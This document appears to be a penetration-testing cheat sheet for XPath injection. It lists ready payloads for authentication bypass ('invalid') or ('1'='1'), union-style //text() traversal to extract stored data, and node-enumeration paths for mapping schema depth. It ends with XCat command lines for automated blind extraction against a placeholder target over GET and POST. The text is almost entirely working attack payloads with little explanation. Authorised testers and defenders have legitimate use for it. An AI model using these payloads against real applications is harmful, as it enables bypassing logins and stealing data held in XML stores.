XPath injection

XML Path Language (XPath) injection

Identification

Authentication bypass

Data exfiltration

invalid') or ('1'='1
 | //text()
..//text()
../..//text()
../../..//text()
../../../..//text()
../../../../..//text()
1234 or contains(.,'<text-to-search>')

Schema depth

| /*[1]
| /*[1]/*[1]
| /*[1]/*[2]
| /*[1]/*[3]
| /*[1]/*[1]/*[1]
| /*[1]/*[1]/*[2]
| /*[1]/*[1]/*[3]
| /*[1]/*[2]/*[1]
| /*[1]/*[2]/*[2]
| /*[1]/*[2]/*[3]
| /*[1]/*[3]/*[1]
| /*[1]/*[3]/*[2]
| /*[1]/*[3]/*[3]

Blind

Tools

XCat

Give the vulnerable parameter (<vulnerable-param>) a sample value that leads to a positive result (<true-condition>).

# GET
xcat run -m GET http://<target>/index.php <vulnerable-param> <param1>=<value1> <param2>=<value2> --true-string=<true-condition> --headers=<headers.txt>
# POST
xcat run -m POST http://<target>/index.php <vulnerable-param> <param1>=<value1> <param2>=<value2> --true-string=<true-condition> --encode=form --headers=<headers.txt>
